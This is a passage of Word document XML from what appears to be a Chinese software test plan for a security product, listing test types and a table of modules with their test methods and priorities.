                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Jmeter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B76C972" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A98B2A9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc222309959"/>
      <w:bookmarkStart w:id="231" w:name="_Toc227386342"/>
      <w:bookmarkStart w:id="232" w:name="_Toc227386485"/>
      <w:bookmarkStart w:id="233" w:name="_Toc36487908"/>
      <w:bookmarkStart w:id="234" w:name="_Toc36573227"/>
      <w:bookmarkStart w:id="235" w:name="_Toc36630304"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
      <w:r w:rsidRPr="00536672">
        <w:t>分类和</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r w:rsidRPr="00536672">
        <w:t>法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w14:paraId="1F0AA27D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Toc227386486"/>
      <w:bookmarkStart w:id="237" w:name="_Toc227386343"/>
      <w:bookmarkStart w:id="238" w:name="_Toc36487909"/>
      <w:bookmarkStart w:id="239" w:name="_Toc36573228"/>
      <w:bookmarkStart w:id="240" w:name="_Toc36630305"/>
      <w:r w:rsidRPr="00536672">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ase</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>设计</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和管理的规范</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="238"/>
      <w:bookmarkEnd w:id="239"/>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w14:paraId="76084583"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采用统一的</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>case模板</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，编辑修改后同步到项目资源</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>管理</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FA3F5"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详见：持续免疫系统测试用例表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E21C11A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Toc36487910"/>
      <w:bookmarkStart w:id="242" w:name="_Toc36573229"/>
      <w:bookmarkStart w:id="243" w:name="_Toc36630306"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>分类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="3FF9C6C8"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功能测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BB34E"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兼容性测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2AB092"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性能测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4A6FC"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接口测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A46D222"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安全性和访问控制测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F85239"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数据完整性测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16770F87"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集成测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B7812"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用户界面测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A3610"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负载测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8D076"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强度测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC23819"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容量测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF1364"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故障转移；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C7A3EA"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配置测试；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE837E1"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安装测试等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B46D7C"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功能测试，根据需求分析的思维导图和功能测试的测试用例覆盖功能模块；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D8F11D"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lastRenderedPageBreak/>
        <w:t>界面测试：测试要点所涉及的所有界面须与界面原型保持一致，无论是设计、样式、色调等等均需保持一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A68873"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兼容性测试：要根据产品的应用场景来考虑，比如IE、Chorme、ios、android、不同机型等等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD9658"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性能测试：根据产品架构、预估数据、线上数据来判断需要执行性能测试的功能接口（比如登录接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0D7D64"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接口测试：安全性测试等等要根据实际的项目需求来确定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539053D9"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将需要用到的测试类型按照测试场景、测试方法等以引用文件的形式填写到测试计划中去，以便让所有项目人员清楚的知道要做哪些测试工作以及怎么做。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED8299" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="_Toc36487911"/>
      <w:bookmarkStart w:id="245" w:name="_Toc36573230"/>
      <w:bookmarkStart w:id="246" w:name="_Toc36630307"/>
      <w:r w:rsidRPr="00536672">
        <w:t>分模块制定</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
      <w:bookmarkEnd w:id="245"/>
      <w:bookmarkEnd w:id="2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661"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="2042"/>
        <w:gridCol w:w="1803"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="1DAA0FB6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="4CB80E75"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测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="4C0F8767"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测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>要</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="0ACA5FA6"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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="10C425FE"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b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>优先级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="4FF24E13"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b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="08FBBD88" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="202986AC"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登录/注册</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="742027E2"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界面测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A6FA2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接口测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D82134"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性能测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7EC31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安全和访问控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500E7B0E"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p w14:paraId="5693A90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接口</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>自动化测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C8E67B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B3EF492" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2939507E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D1C83E"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57CDCFAC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA2B710"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首页展示</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4955C48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界面测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A61D944"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接口测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D8FE91"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数据完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAAB3B4"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p w14:paraId="38BCCE9E"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接口</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>自动化测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E4F4F27" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039C5726"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中</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC80753"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716D71B9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA4CF21"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信息中心</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06AAF012"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界面测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C8962A"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接口测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3835A8DE"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数据完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D9C1DC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p w14:paraId="692FEA15"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自动化测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3412D9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EC40C4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中</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="221742E1"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2D4713DB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EB0CB0F"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i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>可信防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6AB3E0"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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B835F69"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接口测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69EFFA1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性能测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365B0280"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兼容性测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C7BCBC7"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安全性测试；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="144584F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p w14:paraId="4A0B7C6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接口</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>自动化测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B078D9"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UI</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>自动化辅助测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E18F938" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F1DB1C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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21394635"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需要登陆到被保护节点，进行安全测试和破坏性测试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="4AC829EA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AD17FAB"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攻防态势</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="721B850E"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界面测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CC644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接口测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="503074FA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E046B97"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p w14:paraId="3AA078B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3943DDDF"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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BA3823C"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54D96D2B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BFCC20F"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威胁情报</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AADA14D"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界面测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6211D785"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接口测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6185ED45"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p w14:paraId="69EC55BE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA24685"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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E7836C2"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378EEA03" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="687"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="343DE968"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区块链web服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1726" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46300C01"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功能</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C49584E"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接口测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64CD8F49"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p w14:paraId="3CFED36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接口</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2140" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17005E1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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0425C1F8"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3E624C11" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00B4414C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
